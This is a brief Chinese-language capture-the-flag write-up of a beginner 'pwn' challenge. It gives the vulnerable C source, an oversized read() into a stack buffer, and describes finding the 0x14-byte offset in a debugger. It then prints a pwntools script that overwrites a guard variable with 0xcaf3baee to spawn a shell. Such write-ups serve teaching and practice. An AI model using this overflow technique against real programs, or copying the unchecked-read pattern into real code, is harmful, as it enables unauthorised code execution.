题目链接
一道pwn50
查看源码
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void run_cmd(char * cmd){
system(cmd);
}
int main(int argc, char ** argv){
struct { //order enforcement from josh offsec
char buf[17];
int32_t x;
int32_t y;
} _holder = {
{0},
0xdeadbeef,
};
puts("Are you a big boiiiii??");
read(0,_holder.buf, 0x18);
if (_holder.x == 0xcaf3baee)
run_cmd("/bin/bash");
else{
run_cmd("/bin/date");
}
return 0;
}
read()函数有栈溢出
调试
断点打到read下一条指令
search-pattern 12345678 找到缓冲区
查看缓冲区附近的栈内容
从12345678到deadbeef, 所以该缓冲区分配了8+ 8 + 4 = 20字节的空间, 即0x14
有了准确缓冲区大小, 就可以写exploit了, 目的是溢出覆盖_holder.x ← 0xcaf3baee, 就能绕过检查
from pwn import *
target = process('./boi')
payload = 'A' * 0x14 + p32(0xcaf3baee)
target.send(payload)
target.interactive()
用python2打, 一般的pwn都是用py2(大概)
拿到shell~